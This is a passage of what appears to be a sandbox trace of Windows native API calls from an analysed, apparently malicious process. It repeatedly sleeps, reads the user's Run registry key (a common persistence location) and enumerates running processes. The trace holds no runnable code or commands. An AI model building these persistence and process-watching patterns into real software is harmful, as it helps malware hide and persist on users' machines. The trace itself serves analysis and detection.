0x0 [0187.410] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.419] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.419] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.419] NtClose (Handle=0x154) returned 0x0 [0187.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.419] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.422] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.435] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.435] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.436] NtClose (Handle=0x154) returned 0x0 [0187.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.440] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.450] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.450] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.450] NtClose (Handle=0x154) returned 0x0 [0187.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.455] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.466] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.466] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.466] NtClose (Handle=0x154) returned 0x0 [0187.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.472] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.481] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.481] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.482] NtClose (Handle=0x154) returned 0x0 [0187.482] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.486] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.497] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.497] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.497] NtClose (Handle=0x154) returned 0x0 [0187.497] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.501] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.512] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.513] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.513] NtClose (Handle=0x154) returned 0x0 [0187.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.516] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.528] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.528] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.528] NtClose (Handle=0x154) returned 0x0 [0187.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.533] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.544] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.545] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.545] NtClose (Handle=0x154) returned 0x0 [0187.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.549] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.572] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.572] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.572] NtClose (Handle=0x154) returned 0x0 [0187.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.577] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.590] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.590] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.590] NtClose (Handle=0x154) returned 0x0 [0187.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.595] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.607] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.607] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.607] NtClose (Handle=0x154) returned 0x0 [0187.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.611] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.621] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.622] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.622] NtClose (Handle=0x154) returned 0x0 [0187.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.626] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.637] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.637] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.637] NtClose (Handle=0x154) returned 0x0 [0187.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, 